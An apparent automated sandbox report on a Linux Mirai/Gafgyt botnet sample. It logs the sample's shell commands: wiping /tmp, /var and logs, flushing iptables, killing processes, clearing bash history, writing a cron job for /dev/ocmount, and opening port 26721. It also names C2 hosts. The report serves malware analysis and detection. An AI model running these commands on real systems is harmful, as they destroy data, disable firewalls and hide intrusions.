              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/119/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/119/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/3631/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/3631/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/914/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/914/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/10/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/10/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/917/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/917/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/11/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/11/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/12/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/12/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/13/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/13/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/14/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/14/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/15/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/15/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/16/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/16/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/17/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/17/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/18/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/18/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/19/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/19/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/240/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/240/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/3095/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/3095/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/5270/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/5270/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/120/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/120/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/241/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/241/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/121/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/121/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/242/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/242/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/1/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/1/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/122/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/122/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/243/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/243/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/2/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/2/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/123/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/123/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/244/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/244/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/3/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/3/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/124/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/124/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/245/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/245/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/1588/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/1588/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/125/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/125/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/4/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/4/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/246/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/246/cmdlineJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5436)Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5442)Shell command executed: sh -c "rm -rf /tmp/*"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5445)Shell command executed: sh -c "iptables -F"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5451)Shell command executed: sh -c "pkill -9 busybox"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5454)Shell command executed: sh -c "pkill -9 perl"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5465)Shell command executed: sh -c "pkill -9 python"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5474)Shell command executed: sh -c "service iptables stop"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5484)Shell command executed: sh -c "/sbin/iptables -F; /sbin/iptables -X"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5488)Shell command executed: sh -c "service firewall stop"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5499)Shell command executed: sh -c "history -c"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5501)Shell command executed: sh -c "rm -rf ~/.bash_history"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5504)Shell command executed: sh -c "history -w"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5514)Shell command executed: sh -c "chmod +x /dev/ocmount"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5540)Shell command executed: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5589)Shell command executed: sh -c /dev/ocmountJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5828)Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5854)Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5857)Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5860)Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5863)Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5806)Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5823)Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5843)Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5846)Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5850)Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /bin/sh (PID: 5539)Chmod executable: /usr/bin/chmod -> chmod +x /dev/ocmountJump to behavior
              Source: /bin/sh (PID: 5447)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
              Source: /bin/sh (PID: 5486)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
              Source: /bin/sh (PID: 5487)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
              Source: /bin/sh (PID: 5842)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5819)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5453)Pkill executable: /usr/bin/pkill -> pkill -9 busyboxJump to behavior
              Source: /bin/sh (PID: 5460)Pkill executable: /usr/bin/pkill -> pkill -9 perlJump to behavior
              Source: /bin/sh (PID: 5467)Pkill executable: /usr/bin/pkill -> pkill -9 pythonJump to behavior
              Source: /bin/sh (PID: 5438)Rm executable: /usr/bin/rm -> rm -rf /tmp/HNzkADzkE2.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-XwDkMg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-wDpo1e /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-FOsKgj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-k0Nyjf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi /var/log/wtmpJump to behavior
              Source: /bin/sh (PID: 5444)Rm executable: /usr/bin/rm -> rm -rf /tmp/*Jump to behavior
              Source: /bin/sh (PID: 5503)Rm executable: /usr/bin/rm -> rm -rf /root/.bash_historyJump to behavior
              Source: /usr/sbin/service (PID: 5476)Systemctl executable: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5479)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 5481)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /usr/sbin/service (PID: 5490)Systemctl executable: /usr/bin/systemctl -> systemctl stop firewall.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5493)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 5495)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /usr/bin/chmod (PID: 5539)File: /dev/ocmount (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /bin/sh (PID: 5540)Crontab like entry written: /etc/cron.d/mount.shJump to dropped file
              Source: /tmp/HNzkADzkE2.elf (PID: 5512)Writes shell script file to disk with an unusual file extension: /dev/ocmountJump to dropped file
              Source: /usr/sbin/service (PID: 5482)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
              Source: /usr/sbin/service (PID: 5496)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
              Source: submitted sampleStderr: Failed to stop iptables.service: Unit iptables.service not loaded.Failed to stop firewall.service: Unit firewall.service not loaded.sh: 1: history: not foundsh: 1: history: not found: exit code = 0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: /usr/bin/rm (PID: 5438)File: /tmp/HNzkADzkE2.elfJump to behavior
              Source: /usr/bin/pkill (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5467)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5434)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/busybox (PID: 5856)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/busybox (PID: 5865)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/busybox (PID: 5841)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/busybox (PID: 5852)Queries kernel information via 'uname': Jump to behavior
              Source: HNzkADzkE2.elf, 5434.1.000055976d188000.000055976d234000.rw-.sdmp, HNzkADzkE2.elf, 5825.1.000055976d188000.000055976d234000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
              Source: HNzkADzkE2.elf, 5434.1.00007ffd85a0f000.00007ffd85a30000.rw-.sdmp, HNzkADzkE2.elf, 5825.1.00007ffd85a0f000.00007ffd85a30000.rw-.sdmpBinary or memory string: Px86_64/usr/bin/qemu-mipsel/tmp/HNzkADzkE2.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/HNzkADzkE2.elf
              Source: HNzkADzkE2.elf, 5434.1.000055976d188000.000055976d234000.rw-.sdmp, HNzkADzkE2.elf, 5825.1.000055976d188000.000055976d234000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
              Source: HNzkADzkE2.elf, 5434.1.00007ffd85a0f000.00007ffd85a30000.rw-.sdmp, HNzkADzkE2.elf, 5825.1.00007ffd85a0f000.00007ffd85a30000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: HNzkADzkE2.elf, type: SAMPLE
              Source: Yara matchFile source: 5434.1.00007f101c400000.00007f101c435000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5825.1.00007f101c400000.00007f101c435000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: HNzkADzkE2.elf, type: SAMPLE
              Source: Yara matchFile source: 5434.1.00007f101c400000.00007f101c435000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5825.1.00007f101c400000.00007f101c435000.r-x.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: HNzkADzkE2.elf, type: SAMPLE
              Source: Yara matchFile source: 5434.1.00007f101c400000.00007f101c435000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5825.1.00007f101c400000.00007f101c435000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: HNzkADzkE2.elf, type: SAMPLE
              Source: Yara matchFile source: 5434.1.00007f101c400000.00007f101c435000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5825.1.00007f101c400000.00007f101c435000.r-x.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Command and Scripting Interpreter
              1
              Systemd Service
              1
              Systemd Service
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              11
              Security Software Discovery
              Remote ServicesData from Local System1
              Non-Standard Port
              Exfiltration Over Other Network Medium1
              Service Stop
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              2
              File and Directory Permissions Modification
              LSASS Memory1
              System Network Configuration Discovery
              Remote Desktop ProtocolData from Removable Media1
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Scripting
              Logon Script (Windows)1
              Hidden Files and Directories
              Security Account Manager1
              File and Directory Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Disable or Modify System Firewall
              NTDS1
              System Information Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              File Deletion
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527520 Sample: HNzkADzkE2.elf Startdate: 07/10/2024 Architecture: LINUX Score: 100 102 octopus1337.geek 156.238.224.214, 43652, 43654, 43656 XHOSTSERVERUS Seychelles 2->102 104 212.118.43.167, 2222, 40720 CITYLAN-ASRU Russian Federation 2->104 106 Antivirus / Scanner detection for submitted sample 2->106 108 Multi AV Scanner detection for submitted file 2->108 110 Yara detected Gafgyt 2->110 112 Yara detected Mirai 2->112 11 HNzkADzkE2.elf 2->11         started        13 gvfsd-fuse fusermount 2->13         started        16 gnome-session-binary sh gsd-wacom 2->16         started        18 24 other processes 2->18 signatures3 process4 signatures5 20 HNzkADzkE2.elf 11->20         started        22 HNzkADzkE2.elf sh 11->22         started        24 HNzkADzkE2.elf sh 11->24         started        26 10 other processes 11->26 120 Sample reads /proc/mounts (often used for finding a writable filesystem) 13->120 process6 process7 28 HNzkADzkE2.elf 20->28         started        32 HNzkADzkE2.elf 20->32         started        34 HNzkADzkE2.elf 20->34         started        44 3 other processes 20->44 36 sh service systemctl 22->36         started        38 sh rm 24->38         started        40 sh service systemctl 26->40         started        42 sh rm 26->42         started        46 7 other processes 26->46 file8 100 /dev/ocmount, Bourne-Again 28->100 dropped 122 Manipulation of devices in /dev 28->122 48 HNzkADzkE2.elf 28->48         started        50 HNzkADzkE2.elf sh 28->50         started        60 4 other processes 28->60 54 HNzkADzkE2.elf sh 32->54         started        62 4 other processes 32->62 124 Sample tries to kill multiple processes (SIGKILL) 34->124 126 Tries to stop the "iptables" service 36->126 56 service 36->56         started        64 3 other processes 36->64 128 Sample deletes itself 38->128 66 4 other processes 40->66 58 HNzkADzkE2.elf 44->58         started        signatures9 process10 file11 68 HNzkADzkE2.elf sh 48->68         started        70 HNzkADzkE2.elf sh 48->70         started        72 HNzkADzkE2.elf sh 48->72         started        77 2 other processes 48->77 98 /etc/cron.d/mount.sh, ASCII 50->98 dropped 114 Sample tries to persist itself using cron 50->114 74 sh iptables 54->74         started        79 2 other processes 56->79 81 3 other processes 60->81 83 4 other processes 62->83 85 2 other processes 66->85 signatures12 process13 signatures14 87 sh iptables 68->87         started        90 sh busybox 70->90         started        92 sh busybox 72->92         started        118 Executes the "iptables" command to insert, remove and/or manipulate rules 74->118 94 sh 77->94         started        96 sh 77->96         started        process15 signatures16 116 Executes the "iptables" command to insert, remove and/or manipulate rules 87->116

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              HNzkADzkE2.elf53%ReversingLabsLinux.Backdoor.Gafgyt
              HNzkADzkE2.elf100%AviraEXP/ELF.Mirai.W
              SourceDetectionScannerLabelLink
              /dev/ocmount0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              octopus1337.geek
              156.238.224.214
              truefalse
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://Change_ip/octopus_re.sh;chmodHNzkADzkE2.elffalse
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  156.238.224.214
                  octopus1337.geekSeychelles
                  394281XHOSTSERVERUSfalse
                  212.118.43.167
                  unknownRussian Federation
                  25308CITYLAN-ASRUfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  156.238.224.214arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                    x86.elfGet hashmaliciousMiraiBrowse
                      arm7.elfGet hashmaliciousMiraiBrowse
                        212.118.43.167arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                          x86.elfGet hashmaliciousMiraiBrowse
                            arm7.elfGet hashmaliciousMiraiBrowse
                              0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                                lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                                  uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                                    DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                                      9jjtFFX0Tb.elfGet hashmaliciousUnknownBrowse
                                        ceKWlceqnf.elfGet hashmaliciousUnknownBrowse
                                          ULDAb4NYKK.elfGet hashmaliciousUnknownBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            octopus1337.geekarm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.238.224.214
                                            x86.elfGet hashmaliciousMiraiBrowse
                                            • 156.238.224.214
                                            arm7.elfGet hashmaliciousMiraiBrowse
                                            • 156.238.224.214
                                            oc_x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 149.88.81.199
                                            oc_aarch64.elfGet hashmaliciousUnknownBrowse
                                            • 149.88.81.199
                                            oc_mips.elfGet hashmaliciousUnknownBrowse
                                            • 149.88.81.199
                                            oc_i686.elfGet hashmaliciousMiraiBrowse
                                            • 149.88.81.199
                                            oc_arm7.elfGet hashmaliciousUnknownBrowse
                                            • 149.88.81.199
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CITYLAN-ASRUarm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 212.118.43.167
                                            x86.elfGet hashmaliciousMiraiBrowse
                                            • 212.118.43.167
                                            arm7.elfGet hashmaliciousMiraiBrowse
                                            • 212.118.43.167
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 88.210.6.42
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 88.210.6.42
                                            0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                                            • 212.118.43.167
                                            lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                                            • 212.118.43.167
                                            uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                                            • 212.118.43.167
                                            DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                                            • 212.118.43.167
                                            9jjtFFX0Tb.elfGet hashmaliciousUnknownBrowse
                                            • 212.118.43.167
                                            XHOSTSERVERUSna.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.254.22.230
                                            arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.238.224.214
                                            x86.elfGet hashmaliciousMiraiBrowse
                                            • 156.238.224.214
                                            arm7.elfGet hashmaliciousMiraiBrowse
                                            • 156.238.224.214
                                            https://tiktokmal1vip.com/Get hashmaliciousUnknownBrowse
                                            • 156.238.242.50
                                            https://tkglobalmall.vip/Get hashmaliciousUnknownBrowse
                                            • 156.238.242.50
                                            https://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
                                            • 156.238.197.18
                                            M46uio5ezW.exeGet hashmaliciousXWormBrowse
                                            • 156.238.224.69
                                            154.216.17.9-skid.arm-2024-08-04T06_22_56.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 156.254.22.232
                                            154.216.17.9-skid.mpsl-2024-08-04T06_22_50.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 156.238.223.101
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            /dev/ocmountarm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              x86.elfGet hashmaliciousMiraiBrowse
                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                  oc_i486.elfGet hashmaliciousMiraiBrowse
                                                    oc_x86_64.elfGet hashmaliciousMiraiBrowse
                                                      oc_aarch64.elfGet hashmaliciousUnknownBrowse
                                                        oc_mips.elfGet hashmaliciousUnknownBrowse
                                                          oc_i686.elfGet hashmaliciousMiraiBrowse
                                                            oc_arm7.elfGet hashmaliciousUnknownBrowse
                                                              oc_mipsel.elfGet hashmaliciousUnknownBrowse
                                                                Process:/tmp/HNzkADzkE2.elf
                                                                File Type:Bourne-Again shell script, ASCII text executable
                                                                Category:dropped
                                                                Size (bytes):479
                                                                Entropy (8bit):4.026921351476117
                                                                Encrypted:false
                                                                SSDEEP:6:9rd/9GjuZZXegND07aW02vFgWccOHmAyCHOC1A9KiyhlrxleXUEMJJPJHeIHyHi5:rFGjuZog2+WvFgxq6DhllleXRW8ISCuU
                                                                MD5:A3FC64B86B20A7B2EAA9330E1064D1F1
                                                                SHA1:3A6F294C550A578D5E337F67FD4D9C1984EEA885
                                                                SHA-256:6029DD069BC913653EEC32E54FB005A80FB71EBB5F0A584C71E06AC08FBBECE6
                                                                SHA-512:CE26F2C6ECEC049B7053008E323018EC8A709942A456464A1D423F80B92BCA410D9B0F661093EB732254E6690900AC9A15B6F62450F72E6511195AEE403C50B6
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: arm5.elf, Detection: malicious, Browse
                                                                • Filename: x86.elf, Detection: malicious, Browse
                                                                • Filename: arm7.elf, Detection: malicious, Browse
                                                                • Filename: oc_i486.elf, Detection: malicious, Browse
                                                                • Filename: oc_x86_64.elf, Detection: malicious, Browse
                                                                • Filename: oc_aarch64.elf, Detection: malicious, Browse
                                                                • Filename: oc_mips.elf, Detection: malicious, Browse
                                                                • Filename: oc_i686.elf, Detection: malicious, Browse
                                                                • Filename: oc_arm7.elf, Detection: malicious, Browse
                                                                • Filename: oc_mipsel.elf, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
